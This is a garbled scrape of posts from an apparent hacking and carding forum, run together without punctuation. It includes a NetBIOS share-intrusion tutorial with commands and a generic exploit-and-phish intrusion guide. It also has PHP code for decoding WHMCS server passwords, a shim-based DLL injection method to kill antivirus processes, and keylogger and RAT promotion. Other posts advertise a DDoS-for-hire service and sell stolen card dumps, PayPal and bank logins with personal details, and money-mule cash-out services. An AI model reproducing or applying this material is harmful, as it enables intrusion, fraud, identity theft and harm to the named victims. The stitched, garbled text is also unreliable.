released last night add additional file extensions change img block and file decrypt now victim have possibility open google bitcoin. 
org localbitcoin and onion site for decrypt and ask support help page are creating. 
link not working hello this link not working not working not working. 
thanks for sharing this bro. 
pdf url vulnerabilties linux webvulscan windows linux xampp. 
thetevi wrote codefirethanks man wrote password list containing passwords and most common used password list thanks for downloads post longer allowed here the download thx. 
wow wonder what lol. 
doe wrote ardamax keylogger. 
full ciddi hit button harekete irici bir fakt ardamax keylogger. 
ardamax keylogger kullan etkinli ini yakalayan ifrelenmi bir dosyas kaydeden bir kaydedici. 
dosyas log viewer ile lenebilir. 
uzakta oldu unuzda bilgisayar zda neler oldu unu renmek yazd verilerin otomatik olarak yedeklenmesini lamak veya ocu unuzu izlemek kulland zda arac kullan. 
ayr yetkisiz eri imi tespit etmek bir izleme cihaz olarak. 
kay tlar otomatik olarak posta adresinize nderilebilir keylogger eri imi parola korumal. 
ayr ardamax keylogger kullan ziyaret etti internet adresleri ile ilgili bilgileri kaydeder. 
nmez casus yaz uygulamas vista windows tasarlanm. 
keylogger zellikleri kay tlar vuru lar ifreleri gizli karakterleri yazd. 
yakalama taray lar records taray lar ziyaret web siteleri bir. 
kameras kay periyodik kameras foto raf onlar oturum mak aza yapar. 
posta teslim keylogger ayarlanm zamanlarda posta arac yla teslim size kaydedilen kleri kemmel uzaktan izleme ftp teslim ardamax keylogger ftp teslim yoluyla kleri kaydedildi. 
mikrofon kay ger zamanl rma mikrofondan kay ses. 
lan zerinden arac yla kleri kaydedildi nderir. 
pano yakalama windows panoya kopyalanan metin. 
nmez mod kimseye kesinlikle nmez lar. 
ardamax keylogger rev ubu unda sistem tepsisinde windows vista windows rev neticisi'nde process explorer wintasks. 
lat men 'nde windows lang listesinde nmez. 
rsel zetim periyodik leri oturum mak ekran leri azalar yapar. 
izleme sohbet ardamax keylogger kaydetmek sohbetler daki bir konu her iki taraf izlemek tasarlanm aim windows live messenger icq skype yahoo messenger google talk miranda qip venlik program ayarlar gizli modu oturum koruma lar dosya. 
vuru izleme keylogger nan kullan mda olan uygulama kaydedecektir tarih izleme size bir pencerede bir nan tam zaman belirlemekte lar log viewer lemek keylogger log viewer ile bir html sayfas veya metin olarak. 
boyutlu ardamax keylogger ayn zelliklere sahip programlara birka kat daha. 
mod lleri phaneleri yoktur nedenle boyutu daha performans daha ksektir. 
unicode ardamax keylogger tam olarak japonca ince arap bir karakter setleri karakterleri eren vuru lar kaydetmek yapar unicode karakterleri destekler. 
zellikler windows vista windows windows deste monit rler kullan makineleri otomatik latma dostu aray kolay kurulum not daima vir taramas yap kendi riskiniz ile kleyin. 
can see wait can see cause replyed. 
plz send the software coz cant download not found. 
are doing great job here. 
keep rithmik wrote hey neo nicce post yeer please post part soon waiting for testing and need help need subdomain for testing possible give private kiddle. 
indianhacker domain might changed someone eles. 
thanks for the content man. 
let see you are right not found the requested url forum viewtopic. 
php was not found this server. 
additionally not found error was encountered while trying use errordocument handle the request. 
when you click the link. 
cool dude thanks helped lot man ive been looking for the perfect one. 
thanks for this checker. 
sharp wrote international fake sms sender url. 
netbios hacking what netbios hacking the art hacking into someone else computer through your computer. 
netbios stands for network basic input output system. 
way for lan wan share folders files drives and printers. 
how can this use most people don even know but when they lan wan they could possibly have their entire hard drive shared and not even know. 
can find way into the network their computer our disposal. 
what need windows cain and abel hidden content you must reply see links step finding the target. 
first off need find computer the computer hack into. 
your plugged the lan connected the wan you can begin. 
open cain and abel. 
this program has built sniffer feature. 
sniffer looks for all addresses the local subnet. 
once you have opened the program click the sniffer tab click the start stop sniffer and then click the blue cross another window will pop make sure all host subnet selected and then click. 
then computer names and mac addresses will show. 
now remember the address the computer you are going breaking into. 
you can tell whether the address computer router modem etc that. 
during the next step will begin our trial and error. 
part trial and error now don know have our designated target have computer printer whatever else the lan wan. 
you did get the the target though still recommend reading through this section for could helpful later. 
click the start menu and run type cmd and click. 
this should bring the command prompt. 
from here will most the hacking. 
now will referring certain commands that need inputted into the command prompt. 
will put these commands quotes but not put the quotes the code when you type into the prompt. 
only doing this avoid confusion. 
let get back the hacking. 
type ping address the target. 
for example this tutorial ping. 
this will tell the target online. 
worked will look something like this note have colored out private information didn work meaning that the target not online will look something like this the target not online either switch different target try another time. 
the target online then can proceed. 
part gathering the information. 
now input this command nbtstat address target. 
this will show there file sharing enabled and there will give the currently logged user workgroup and computer name. 
you probably wondering what does all this mean well this actually very important without this the hack would not work. 
let break down from the top bottom. 
will just give the first line information and then explain the paragraph that follows. 
the information right below the original command says local area connection this information tells about our connection through the lan and case not connected through lan the host not found and there. 
the information right below the local area connection wireless network connection gives information about the connection the target through wan. 
case connected through the wan was able find the node ipaddress. 
the node ipaddress the local area the computer you are going break into. 
the netbios remote machine name table give the workgroup our computer tells shared and gives the computer name. 
sometimes will even give the currently logged user but case didn. 
batgirl the name the computer trying connect. 
you look the right you should see. 
this means that file sharing enabled batgirl. 
there was not the right the name then you have reached dead end and need find another quit for now. 
below batgirl the computers workgroup superheroes. 
you are confused about which one the workgroup and the computer look under the type category the right the for every name. 
says unique one system such printer computer. 
group then the workgroup step breaking finally time. 
now know that our target online our target has file sharing and our target computer name. 
will now locate the shared drives folders files printers. 
type net view address target example for this tutorial would net view. 
have our just found our share name. 
this case under the share name meaning that the only shared thing the computer. 
then the right under type says disk. 
this means that the actual disk the computer. 
the disk can sometimes entire person hard drive. 
all's that left map the shared drive onto our computer. 
this means that will make drive our computer and all the contents the targets computer can accessed through our created network drive. 
type net use address target shared drive. 
for example this tutorial net use. 
let say that you plan doing this again different person see the after net use this the letter the drive that you are making your computer. 
can any letter you wish long the same letter not use your computer. 
you can see for hack have already used used instead. 
you may also the same for multiple hacks. 
worked will say the command completed successfully. 
not you will have retrace you steps. 
now open computer under the start menu and your newly created network drive should there. 
now you disconnect from the wan lan you will not able access this drive hence the name network drive. 
the drive will not deleted after you disconnect though but you won able access until you reconnect the network. 
you are doing this for the content the drive recommend dragging the files and folders inside the drive onto your computer because you never know the target changes the sharing setting. 
you are just doing this hack something then explore and have some well deserved fun you done commands used this tutorial ping nbtstat address target net view address target net use address target sharename. 
cool bro thaxcool bro thax. 
thanks bunch for this bro. 
link doesn't work anymore. 
thanks for the great tool. 
releseing spaming tool that you can use skype and other things link. 
would love see this shit. 
are proud offer probably the best service for the implementation ddos attacks the world. 
for about years worked russian underground market offering high quality ddos service. 
perform successfully attacks any difficulty problem for such popular ddos protections like cloudflare ddos guard incapsula etc. 
our network unique development which been improved over the years and now offer the power our network western and european customers. 
only work with our own technologies and developments experience. 
about five years are constantly improving our technologies this sphere and apply new modern solutions quality. 
our experience allows exploit various the targeted servers making the attack our performance efficient possible power. 
thanks continuous improvement our technologies and almost limitless source resources can provide huge attacking potential decency. 
adequate conditions for the refunds see for yourself. 
can provide free test attacks web servers prices day starts from days starts from days starts from prices may vary depending the complexity the target. 
prices for the well protected projects cloudflare starts from per day ddos guard starts from per hour incapsula starts from per hour other projects with behavioral protection starts from per hour conditions prepayment work strictly prepayment minimum prepayment day work except when the daily cost exceeds. 
test attack almost always provide test attack the specified client project demonstrate our capabilities and estimation cost. 
refund are ready return unearned funds cases failure assigned tasks changes the value work. 
complete anonymity guarantee the the fact working with specific customers and specific projects. 
refusal reserve the right refuse grant our services without giving reason. 
additional information usually don use channel overflow attacks. 
use smart botnet with capability simulate legitimate traffic targeted websites. 
our unique development osa module has ability pass any web browser checks and captcha tests. 
fact complete simulation legitimate user. 
contact jabber overloadlab exploit. 
icq for forum administration are ready pass any tests prove our services. 
samirphuyal wrote sorry but can you tell how your instagram account was hacked don't know how was hacked message popped the last time was last year said that was logged out tried logging back didn't work checked account saw that someone was posting was pretending they've been doing for almost all this year adamwolve wrote tell some info may will help info like what. 
thank for share good luck you. 
can you give the link free phone spy application software for window android. 
that's wrote working method. 
thanks man will give this try cfvsv vxddvxd. 
hello man thank you for replying how much can earn this methord have amd vga thank you. 
man did you get any payouts. 
hacker wrote selling private passwords pornportal accounts only for best selling one account give access wicked mofos twistys babes etc. 
pass price starts from. 
crack naughtyamerica bangbros mofos now. 
payments accepted paypal payza contact only skirby starcraft mofos iknowthatgirl publicpickups wicked twistys babes tiger gracie mofos iknowthatgirl publicpickups jdcohen jdc mofos iknowthatgirl publicpickups ren ren arsis brownhole. 
codefire wrote hidden content you must reply see links blink use your own risk blink cracked just saying that this very badly coded rat the biggest skid this world that xillux. 
the connection very unstable the gui always flickering because the bad multi threading and many more bugs. 
reply and see downloading link hide reply url hide reply thx for the rat bro codefire wrote hidden content you must reply see links blink use your own risk blink cracked just saying that this very badly coded rat the biggest skid this world that xillux. 
reply and see downloading link hide reply url hide reply tthx. 
makinged wrote download before move them url contact anyone want any hacking stuff done but wont free thanks for sharing with the community. 
new update try stuff just valid big big big update mail billyhiman gmail. 
com icq fresh first hand fullz visa master amex dis with dob amex dis amex dis full info full info australia switzerland france germany mexico new zealand italy asian cvv all country and many country other master and visa bin fullz rezult online atm checkcard pin pass afsar credit debit card and other accounts details ccno expdate ccpin credit debit card billing address details fullname fereshteh rouhi address line anza blvd address line city san jose state zip phone mail frouhi aol dot com mailpassword blue normal formate firstname lastlame address city state email zipcode country phone cardnumber expirydate cvv verifed paypal accounts acc paypal verified with balance acc paypal verified with balance acc paypal verified with balance email address paypal password full information there complete account information before selling username username password name curt jentsch address marks apt brooklyn united states paypal balance. 
usd credit card yes last numbers card type visa confirmed bank accounts confirmed account type premier status verified last log june pdt country check date socks. 
banklogins available bank login scotia online wachovia netbank. 
abbey hsbc bremer online banking flagstar bank kbc bank entercard postbank credit union wamu landmark orchard american express wells fargo icici bank chase pen air federal. 
bank rbc first trust bank banque nationale hdfc bank prices email address password and complete information western union western uninon western union transfers western union money transfer most countries transfer upfront whatever amount you want transfer for you you want you will have pay upfront. 
will give you mtcn and sender info and all cash out info. 
require receiver first name and last name receiver address receiver email address payment info the list electronics shopping best buyer and lowes store pick only laptop apple laptop dell laptop toshiba laptop lenovo laptop samsung laptop acer laptop vaio iphone iphone ipad black berry iphone iphone perfums. 
classic standart discover gold plat bus corp sign amex small corporate corporate centurion. 
code and electron classic standart gold plat bus corp sign. 
code electron classic standart gold plat bus corp sign infinite. 
code and classic standart discover gold plat bus corp sign. 
code and classic standart discover gold plat bus corp sign new update try stuff just valid big big big update asia latin america dumps are stock and tracks for cheapest price hurry get the freshest stuff from dont miss have the solution prices not high you can easily start your work have damn good approval bases don't fuck around with clients respect anybody who have biz with give orders instantly online that's because not shitty reseller sell only own dumps all prices and countries contact. 
rules providing dumps service. 
can offer you track track fresh base sale approvall rate best bins not sell bad dumps dumps from list you will never find somewhere else. 
not busy and you made corrcet payment you will have dumps minutes after the payment some base will take hrs hours rules conditions change ask more icq. 
glad see you monitor. 
long talk just valid dumps very affordable and high quality dumps vending service. 
approved dumps only payment method btc rules long talk please read rules respect them. 
free test all buyers who want test stuff can buy and test bulk order have special prices contact for info. 
have guarantee about limit are not selling money are only responsible for valid. 
instant delivery stuffs are sent you after full payment for the order. 
never make refund only replace. 
price are mention but can down. 
service rules can changed any moment without customer notifications. 
mobile buyers can get replace road you don't trust service. 
please not contact mail billyhiman gmail. 
com icq thanks for reading topic want you know that dont play here and also dont play with customers well. 
let give ourselves try and also see what happens. 
because all stuffs are really valid and also working approximately. 
can give you assurance and also swear that bases. 
hope this works ahahahah. 
first person who hack new website. 
klarka college project and need test security. 
mean that everything secured. 
i've got budget that. 
gets first person who puts there password. 
password simple but algorythm difficult. 
must try this maybe still working edit dont work. 
hello everyone when having any problems. 
you can always contact. 
contact live chat leave offline message are not online. 
download site close please update the link. 
irfi wrote which host. 
how know that hosting forget pass any ideo who. 
com anyone those merei bhai. 
com code proxies socks anonymous transplant update everday. 
can you please update the links. 
repy see hidden content. 
good tutorial for noobs. 
you arwe life saver. 
application name advanced all pdf. 
application name advanced pdf password remover. 
application name advanced pdf converter. 
com protection type serial packer protector non release type patch download target from here code url. 
com url download patch from here code url. 
let's see the content. 
wrote shitty logo yeah know well you're here for the program. 
credits wlit api implantation works flawless any address currently bugs known. 
please comment you download keep thread alive. 
but download link not alive its dead please update. 
open the service for receiving remittances. 
work with the systems western union moneygram. 
transfers will only accepted data intercepting't that. 
name drop the region obtaining from you transfer number name sender the region departure sum work with amounts from. 
our commission from depending volume your percentage will send advance any designated currency any convenient way for you interested please write kostpeskov gmail. 
codefire wrote shitty logo yeah know well you're here for the program. 
wwow very nic ewill try. 
looks good thx gonna try. 
thanks for this man gonna check out now codefire teamleak replying due didnt pop for fuck skae. 
thank you very nice tool. 
very nice tutorial like this the link has been deleted. 
some darknet websites especially marketplaces usually require invite invite code. 
these should have working invite. 
what sql injection sql injection code injection technique used attack data driven applications which malicious sql statements are inserted into entry field for execution dump the database contents the attacker. 
how manual simple sql injection required. 
brain the beauty searching for targets lot easier than sounds the most common method searching dorks. 
dorks are input query into search engine google which attempt find websites with the given text provided the dork itself. 
com how basic sql injection. 
the another method that want reveal you can earn without doing any work happy miner and buy account and some mining for gold and sell virtaex dot com higher price. 
sold account check happy miner coupons website for details. 
great tool really like. 
hey wondering soemone with the knowage take down this forum site and leave note saying something like taken down xbox will have like more dallors. 
thanks lot for this. 
will like try this guy and see. 
added you icq come online. 
all know sql injection that vulnerability which mostly can found any server. 
weather high profile sites low profile sites all are found vulnerable sql injection. 
but the problem comes when unable find vulnerable sites. 
today gonna show you how find these sites vulnerable sql injection. 
let get started method finding sql vulnerable sites server all know server huge amount sites are hosted. 
using server for finding vulnerable sites good option. 
now lets try our first method. 
first select any random site like selected. 
now you process called reverse lookup this site find site hosted server where our selected site hosted. 
reverae lookup you have this site. 
server and the selected site the remote address field and click check like image given below. 
now image you can see the about sites are hosted same server where our selected site hosted. 
now image address the server given top right corner copy. 
php and click search icon. 
with your selected server. 
after that bing will search the sites which have extension php like this. 
php and will give list sites which ends with this extension php like image given below. 
now select any one site and add after the url check wheather site vulnerable sql injection not. 
site vunerable then its good not then check other site from search result. 
found any site vulnerable sql then hack using sql exploiter tools. 
method second will explained next post. 
just comment any problem and share post. 
can't wait try this mate. 
get here hide reply hide reply password hide reply hide reply thanks dude. 
just because new here don't think that don't know anything forget just wanna know who here from mumbai dadar side. 
codefire wrote wibr application for testing security the wpa wpa psk wifi networks. 
this application not fake really works and possible access the wifi network uses weak password. 
read whole description before using. 
dictionary test tries passwords from predefined list one one. 
please don't disappointed the password will not found simply means that was not the dictionary. 
however somebody set his key password will detected. 
list available networks and select desired network. 
wibr tested wpa wpa networks with pre shared key psk. 
please note that the testing will unreliable the signal weak warning hacking somebody else's wifi illegal use this app only your own networks select desired dictionaries. 
there are three predefined wordlist which you can use. 
they contains list most commonly used passwords. 
please note that for wpa passwords the minimum length characters and shorter passwords will skipped. 
the process very slow due nature the wifi connection handling android prepared that can take time. 
passwords minute considered good speed. 
the wifi have enabled all the time wibr also battery eater notes wibr will change password for the selected network. 
impossible get this password back. 
you are testing previously saved network then the password will lost. 
wibr will not work other encryptions than wpa wpa. 
doesn't work you are trying test network with weak unstable signal very noisy environment. 
many networks same channel you are trying access network which using called mac filtering only explicitly allowed devices could access the network the solution try wibr another network with good signal. 
attachment password password for zip. 
this method really works hope this works and want earn something real. 
theking fhearts wrote internet wrote facebyte facebook account scraper. 
friend request bomber too requests hour. 
curioss that the way. 
good envoy mon iphone utilisant tapatalk envoy mon iphone utilisant tapatalk. 
let see the link pls thanks. 
wanna see this thanks. 
does actually work hard blieve would. 
hopefully they all come handy. 
say somehow somewhere ended choosing target start wreaking havoc upon. 
theres plenty papers out there that into how obtain address from the preferred mark your choice. 
i'm not going into that subject. 
alright say got the targets address finally. 
what with this address. 
well first ping the address make sure that its alive. 
now the bottom this document ill include some links where you can obtain some key tools that may help your journey through the electronic jungle. 
need find places get inside the computer can start trying find way hack the box. 
port scanners are used identify the open ports machine thats running network whether its router desktop computer they will all have ports. 
protocols use these ports communicate with other services and resources the network. 
blues port scanner this program will scan the address that you chose and identify open ports that are the target box. 
example idlescan using zombie. 
class incremental interesting ports. 
the ports scanned but not shown below are state closed port state service tcp open ftp tcp open smtp tcp open http tcp open sunrpc tcp open loc srv tcp open tcp open iis tcp open iad tcp open unknown tcp open pcanywheredata tcp open unknown tcp open unknown tcp open unknown example now see that there are variety ports open this box. 
take note all the ports that you see listed before you. 
most them will paired with the type protocol that uses that port. 
http smtp etc etc. 
simply take all that information and paste into notepad the editor your choice. 
this the beginning your targets record. 
now know what ports are open. 
these are all theoretical points entry where could wiggle into the computer system. 
but all know its not that easy. 
alright dont even know what type software what operating system that this system running. 
nmap port scanner has unique fingerprinting methods when the program sees certain series ports open uses its best judgement guess what operating system its running. 
generally correct with experiences. 
have figure out what type software this box running are gonna start hacking the thing right many you have used telnet for your muds and moos and weird multiplayer text dungeons and many you havent even heard before period. 
telnet used open remote connection address through port. 
what that means are accessing their computer from across the internet all need their address and port number. 
with that record you are starting compile open telnet connection the address and enter one the open ports that you found the target. 
this command will open connection through port the. 
now you may see some text the very top the screen. 
you may think well what the hell how that little string text going help. 
well get that list you are starting write and copy the banners into your compilation the information youve gathered your target. 
banners headers are what you get when you telnet the open ports. 
heres example banner from port. 
fri oct now this very important part the enumeration process. 
you notice says 'sendmail. 
well what know now have discovered version number. 
this where can start identifying the programs running the machine. 
there are some instances which companies will try and falsify their headers banners hackers are unable find out what programs are truly installed. 
now just copy all the banners from all the open ports some ports may have and organize them the little record have the target. 
now have all the open ports and list the programs running and their version numbers. 
this some the most sensitive information you can come across the networking world. 
other points interest may the dns server that contains lots information and you are able manipulate than you can pretend hotmail and steal bunch peoples email. 
well now back the task handu. 
apart from actual company secrets and secret configurations the network hardware you got some good juicy info. 
com very good resource for looking software. 
you cant find any there search google. 
there are many many many other sites that post that their groups find and their affiliates. 
securityfocus you can search through vendor and whatnot try and find your peice software you can use the search box. 
when searched securityfocus found paper how sendmail. 
there was proof concept code where they wrote the shellcode and everything you ran the code with the right syntax command prompt would just spawn. 
you should notice the line where your code being typed. 
that pound symbol means that the command prompt window thats currently open was opened root. 
the highest privilage unix linux box. 
you have just successfully hacked box. 
now that you have command shell front you you can start doing whatever you want delete everything you want fucking jerk however dont recommend that. 
maybe leave text file saying how you did and that they should patch their system. 
and many times the best thing you can just lay the shadows dont let anyone know what you did. 
more often than not this the path you are going want take avoid unwanted visits the authorities. 
there are many types exploits out there some are denial service exploits where you shut down box render application process unusable. 
called denial service simply because you are denying service someones box everyone trying access. 
buffer overflow exploits are involved when variable inside some code doesnt have any input validation. 
each letter you enter for the string variable will byte long. 
now where the variables are located when they are use program called the buffer. 
now what you think overflowing the buffer means. 
overflow the buffer can get totally different memory address. 
then people write whats called shellcode hex. 
this shellcode what returns that command prompt when you run the exploit. 
that wasnt the best description buffer overflow however all you need remember that garbage data fills the data registers then the buffer overflows and allows for remote execution almost every command available. 
there are many many other types attacks that cannot all described here like man the middle attacks where you spoof who you are. 
performed correctly the slave will enter. 
com and his connection will redirected your site where you can make username and password box make the site look legit. 
and your poor mark will enter their credentials into your site when they think its really. 
you need have small script set will automatiically display like error something once they try and log with their credentials. 
this makes seem like the site down and the slave doenst give second thought and will simply try again later. 
summary how box when you only have address method works both nix and windoze you can the same with domain names google. 
com than what you can with addresses. 
run whois lookup something along those lines. 
check internic you should able resolve the domain name address. 
port scan the address and record open ports telnet open ports identify software running ports netcat network swiss army knife. 
like telnet only better and with lot more functionality. 
both can used when you are trying fingerprint software open ports record banners and take note the application running and the version number take gander online securityfocus. 
you cant find any then search google. 
make copy some proof concept code for the vulnerability. 
read the documentation there any for the proof concept code you will using for your exploit run the exploit against the slave. 
reap the cheap ownage this document does not into covering your tracks. 
you dare try any this stuff box you dont have consent hack they will simply look the logs and see your address and then straight your isp. 
once you get more you get learn how get away with the nasty deeds. 
this what the majority kode kiddies when they perform attacks. 
the key enumerate all the info you can from the machine the more info you have the system the better. 
user accounts can also enumerated. 
once you have list account names you may then proceed brute force perform cryptanalysis attack gain control the account. 
then you must work privilage escalation. 
users are not admins root. 
codefire wrote these tools are specialised performing and even automating sql injection attacks websites. 
need help regarding fake serial key issue idm. 
using the following method solve this issue but can't able solve run regedit ctl internet download manager find next found the files delete but can't able delete. 
everytime says values not set plss anybody help regarding this thanks advance. 
cant wait see what under the hood this article. 
okay lets try this. 
contact mail mmiv icq info needed for transfers full name city country valid email for sending you mtcn info etc mtcn will ready for pick maximum minus after payment please dont ask for any test transfer prices for western union online transfer asia canada france germany italy and nigeria transfer charges payment btc transfer transfer transfer transfer transfer note only time transfer name week you need daily transfers then you must have use more names. 
price list for bank transfer transfer charges payment btc transfer charges transfer charges transfer transfer contact mail mmiv icq come and let get paid together and here with great best world stuffs stock now. 
codefire wrote password list containing passwords and most common used password list thanks for downloads post longer allowed here the download. 
hey thanks for the share buddy. 
icedlotus wrote always welcome for new exploids great. 
thanks man nice share. 
codecanyon traffic bot faster with referrers hacked with unlimited license only for brothers for free make little money with traffic download here adf. 
never heard this thanks. 
encryption hash hash key hash key hash length strlen hash key string base decode string tmp substr string hash length string substr string hash length strlen string hash length out while hash length. 
chr ord tmp ord hash key key while strlen string and hash length key hash key. 
substr out hash length hash length out. 
chr ord key hash length ord string return out function hash string function exists 'sha hash sha string else hash string out while strlen hash out. 
hash return out post 'form action' include file file post 'file' name file get contents file name str replace name eval name link mysql connect host username password mysql select name link query mysql query select from tblservers while mysql fetch array query ipaddress 'ipaddress' username 'username' type 'type' active 'active' hostname 'hostname' echo password decrypt 'password' encryption hash echo type type echo active active echo hostname hostname echo ipaddress echo username username echo password password echo link mysql connect host username password mysql select name link query mysql query select from tblregistrars echo domain reseller echo while mysql fetch array query registrar 'registrar' setting 'setting' value decrypt 'value' encryption hash value value password decrypt 'password' encryption hash echo registrar setting value echo post 'form action' include file host post 'db host' username post 'db username' password post 'db password' name post 'db name' encryption hash post 'cc encryption hash' link mysql connect host username password mysql select name link query mysql query select from tblservers while mysql fetch array query ipaddress 'ipaddress' username 'username' type 'type' active 'active' hostname 'hostname' echo password decrypt 'password' encryption hash echo type type echo active active echo hostname hostname echo ipaddress echo username username echo password password echo link mysql connect host username password mysql select name link query mysql query select from tblregistrars echo domain reseller echo while mysql fetch array query registrar 'registrar' setting 'setting' value decrypt 'value' encryption hash value value password decrypt 'password' encryption hash echo registrar setting value echo name scrollbar base color scrollbar arrow color olive color white namearea background color color red font weight bold font size font family tahoma border pxsolid input font weight normal background color font size font weight bold color red font family tahoma border solid name whmcs serverpassword decoder symlink. 
php whmcsdb configuration ofwhmcsdb host username passworddb namecc encryption hashpassword decoder. 
password passwordcc encryption hash gael. 
endgam wrote apologize this the wrong section for this. 
this list deep websites their invite codes should they require one. 
i'm not vouching for these sites surf your own risk. 
today wiil tell you how secure your ipb. 
versions from full path disclosure. 
vulnerability full path disclosure solution upgrade version. 
but need upgrade this tut works. 
reproduce this issue this hidden content you must reply see links date search term trolololo guilty variable 'search app filters' which wait receive doubled array forums sortkey. 
doesn't get correctly then errors with full path show. 
normal request would looks like this hidden content you must reply see links forums sortkey date search term trolololo how secure open your cpanel open file manager open forum root folder make new file php. 
ini text editer paste this command display errors off save and close. 
bingo your vulnerability patched thnkx for reading tut. 
next tut will tell you how secure your forum from server rooting. 
medusa wrote thank you man for this great thanks. 
thank you man nice post. 
the file removed bro. 
sarfroz wrote was awsome becoz helped bypass the fortiguard web filtering used university. 
there only one problem that very slow. 
university they have also blocked ultrasurf tor hotspot shield and freegate. 
were getting mbps downloading speed. 
but now everything blocked. 
proxy software was working. 
color ffa but there only one problem that very slow. 
there any method run fast. 
also how use this with idm. 
anyways thanks lot bro color good take this. 
its not working since. 
this simple guide read somebody else facebook messages without any effort cheers mike baghu. 
gona check this out and see works. 
thanks hope this works. 
doe wrote perfect keylogger serial code cracked had some free time decide remember how use ollydbg. 
releasing the serial code for perfect keylogger download trial installer setup and the serial code seriously hit that button that's motivating factor don't think necessary for virus scan but for who skeptical here. 
ejlidibi xepnt hodbfygjeqaqmg greate share man thanks mam. 
this simple guide read somebody else facebook messages without any effort hidden content you must reply see this content cheers mike. 
cheers mike let try this. 
okay lets try out shall. 
thanks man this will fun use. 
hopefully still works thanks. 
nice share you have there. 
lets see works lets hope for the best that work for. 
download link hidden content you must reply see links hidden content you must reply see links. 
cool like free pack. 
source blink blink thanks for the tut. 
may take look please. 
link after the response. 
released attacking the ipv protocol complete tool set attack the inherent protocol weaknesses ipv and icmp and includes easy use packet factory library. 
please note get full access all the available tools you need develop ipv tools yourself submit patches tools and feedback the thc ipv project. 
added new tool detect sniffer windows linux bsd. 
added new tool fake router which gives more control options added new tool dnsrevenum which reverse enumerates the dns added new tool inverse lookup which gets the ipv addresses mac address added new tool fake solicitate which lets you fake neighbor solicate packets added new tool address converts between ipv ipv and mac addresses added new tool passive discovery which detects all sending systems and includes dad detection dnsdic added full srv service scan support option fix for systems thanks alphacc altern dot org some more minor fixes thcping added udp option return code reply reply error reply added tcp port the with tstamp mss wscale options return code tests done and target alive target crashed detect new now the interface passed cmdline option the script implementation added more tests esp ping tests exthdr exthdr size fixes for some tests returns errors least one reply only error replies parasite fixed crash when and were used together parasite now terminates should also ending childrens when using fixed the mac command line parameter that was not working trace fixed crash made bit faster fix for targets further away than hops enhanced error messages kill router fixed target option dos new also doses non link local addresses now toobig fixed crash when mtu size specified was send errors dont result program exits for flood and ndpexhaust tools anymore thc ipv lib changed the thc pcap function have addition parameter promisc before was not promiscous reduce cpu load which affects detect new dos new and parasite changed some function defines from signed unsigned cleaned the code hidden content you must reply see links posted administrator. 
need people that can cash out this bank canada and usa. 
canadian bank transfers cash out for canadians need people cashout interac transfers direct transfers. 
also prefer direct transfers with rbc credit union desjardin for transfer. 
mainly looking for people with accounts with rbc credit unions and desjardin big transfers. 
residents with chase can quickpay navy federal. 
important you have drop with american express credit card can upload more. 
plz contact email daredevil hellfire yahoo. 
note when contacting tell you have give clue where you get contact from. 
hope works home slice. 
thanks for sharing have been able avoid this far but they are getting more and more convincing every day. 
can see how people get tricked good work. 
free skype resolver url. 
com pdy rtfyv download url credits hard style coding. 
tedd sky dark theme the resolver works fine for you please leave thanks. 
can't wait see how this turns out lol. 
hoping this specific method still working would cool. 
checker brute bitcoin accounts. 
works with the below wallet blockchain coin base exodus trezor multibit bitaddress knots bitcoin corebitcoin bitherbither greenbits spacecoin copay airbitz bitcoin mycelium bitgobitgo barcode capturing work through proxy socks. 
removes duplicates and every junk from the list account. 
support for all kinds proxies. 
easy and intuitive interface. 
type baz login domain. 
pass all updates are free. 
contact fantonik cocosoftware inbox. 
this simple guide read somebody else facebook messages without any effort cheers mike reply. 
okay let's try now. 
this simple guide read somebody else facebook messages without any effort cheers mike would like see. 
great hope can use. 
color hey evry here. 
cuming with new technik wich got from one frrnds havent really tried this but think after reading. 
was worth updating here here now show you some simple method killing bit process. 
exe first all read this. 
aspx okay called this shims engine attack then download that toolkit. 
aspx the mechanism shims gives list application compatibility fixes that you can view using the toolkit. 
looking the fixes you can quickly find very interesting for injectdll fix description preloads required static dll files for the application. 
some applications use dynamically loaded dll files which can issue calls static dll files before the application ready. 
this compatibility fix requires command prompt with list the affected dll files. 
the files are loaded the order listed the command prompt. 
now task much clear. 
must create some database compatibility with our toolkit. 
the database will fixes for such processes avp. 
exe now the points create our mod compatibility choose injectdll parameter specify the path the executable dll. 
the best option would the independent path globalroot systemroot dllname next create fix the application just think there all right. 
application use the file without too much crap with the name the necessary process accordingly fixes one database can many while compatibility modes will one. 
creating such base can put her resources. 
our poc cab file you like next task install and register base. 
can solved very simply and automatically and probably little more complicated and manual automatic way this use the built utility sdbinst. 
exe systemroot system sdbinst. 
exe read about here. 
aspx but think lazy lame way manual install first need create two registry hklm software windows currentversion appcompatflags custom this registry would store subkey name process fix for example export reg key hkey local machine software microsoft windows currentversion appcompatflags custom avp. 
sdb hex fbf cfe guid format sdb base guid tag and reg qword this subkey returning value system date and time utc format hklm software windows currentversion appcompatflags installedsdb this registry would store subkey register. 
then must extract data and register our. 
it's possible with sdb api from apphelp. 
dll this block pseudo code read guid. 
sdb base and formating this string with. 
sdb extension code handle path sdb tagidclsid handle roottag apphelp tag database. 
mas guid guid string wcscat guid string. 
sdb handle this block extract name all process's from. 
sdb base code handle path sdb tagid handle roottag apphelp tag exe tagid handle tagid apphelp tag ame tagid null pointer string handle tagid reginst pointer string install here subkey appcompatflags custom with process name pointer string format guid value and system time tagid sdbfindnexttag handle roottag tagid while tagid null handle okay now register time. 
code path sdb null shimflushcache and almost forgot need dropped our injected dll path systemroot dllname. 
code dll simple it's done and must work course there big minus that current launched would unload after rebooting system and still need admin priv install. 
here link video working poc. 
com file the list which were tested with this poc kis eset nod drweb avast mcafee avira bitdefender only bit fsecure panda outpost zonealarm and that's all vulnerable this method course. 
thanks for this bro defo gonna use. 
hey found somehow file download exploit school website. 
asp windows server got into all the configuration files web. 
config which includes connection strings database passwords some other passwords decryption keys other data. 
etc but feel lost couldn't anything far. 
have idea how connect. 
need help from asp experts btw guess that the problem that the sql server local but still need help people. 
any ideas rdp didn't work ftp dont think would work. 
sql connect sad error please help. 
hey all welcome all service shop sell dumps track with pin online without pin buy dumps shop qualiaty good dumps shop sell dumps with pin usa dumps shop chinese dumps shop dumps with pin shop sell dumps good valid hight balance great quality dumps with pin valid selling dumps track pin china dumps pin usa euro turkey dumps pin and many different countries shop dumps. 
php buy dumps atm sell dumps shop online china turkey dumps pin janpan usa track track buy dumps atm sell dumps shop online china turkey dumps pin janpan usa track track china dumps tracks pin usa dumps tracks pin brazil dumps tracks pin canada dumps tracks pin france dumps tracks pin germany dumps tracks pin italy dumps tracks pin norway dumps tracks pin turkey dumps tracks pin and more. 
